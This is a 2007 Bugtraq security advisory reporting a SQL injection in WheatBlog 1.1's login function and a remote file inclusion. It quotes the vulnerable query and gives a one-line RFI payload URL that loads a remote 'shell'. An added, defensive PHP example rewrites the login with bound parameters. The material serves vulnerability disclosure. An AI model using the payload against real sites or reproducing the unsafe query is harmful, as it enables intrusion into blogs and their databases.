List: bugtraq
Subject: WheatBlog 1.1 RFI/SQL Injection
From: underwater () itdefence ! ru
Date: 2007-06-30 14:52:04
Message-ID: 20070630145204.28681.qmail () securityfocus ! com
Found by E.Minaev (underwater@itdefence.ru)
ITDefence.ru
1) SQL Injection in login function. With the help of this injection it is possible to do a per-symbol brute force of the table names of the blog's database (magic_quotes_gpc should be turned off).
------------------------------------------
"$sql = "select * from $tblUsers where login = '$login'";
if ( $login != $row['login'] ) $valid_user = 0;
if ( $password != $row['password'] ) $valid_user = 0;"
------------------------------------------
2) Remote File Inclusion (RFI)
/includes/sessions.php?wb_class_dir=shell?
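
Added example, not part of the original advisory and not WheatBlog's code: the login lookup from item 1 rewritten with a bound parameter, so the query no longer depends on magic_quotes_gpc. The PDO/SQLite setup, the wb_users table name, the function names and the use of password_hash() are assumptions made for illustration.

```php
<?php
// Added example, not WheatBlog code. The query shape follows the snippet in
// the advisory; the in-memory SQLite database and sample row are constructed.
declare(strict_types=1);

function find_user(PDO $db, string $tblUsers, string $login): ?array
{
    // A table name cannot be a bound parameter, so restrict it to an identifier.
    if (!preg_match('/^[A-Za-z_][A-Za-z0-9_]*$/', $tblUsers)) {
        throw new InvalidArgumentException('bad table name');
    }
    // $login is bound, never concatenated, so a quote in it stays data.
    $stmt = $db->prepare("select login, password from $tblUsers where login = :login");
    $stmt->execute([':login' => $login]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

function check_login(PDO $db, string $tblUsers, string $login, string $password): bool
{
    $row = find_user($db, $tblUsers, $login);
    if ($row === null) {
        return false; // unknown login: fail closed instead of comparing against an empty row
    }
    // Assumption: passwords are stored with password_hash(), not in plaintext.
    return hash_equals($row['login'], $login)
        && password_verify($password, $row['password']);
}

// Constructed sample data (hypothetical table and account).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('create table wb_users (login text primary key, password text)');
$ins = $db->prepare('insert into wb_users (login, password) values (?, ?)');
$ins->execute(['admin', password_hash('correct horse', PASSWORD_DEFAULT)]);

var_dump(check_login($db, 'wb_users', 'admin', 'correct horse')); // valid credentials
var_dump(check_login($db, 'wb_users', 'admin', 'wrong'));         // wrong password
var_dump(check_login($db, 'wb_users', "admin'", 'correct horse')); // login containing a quote
```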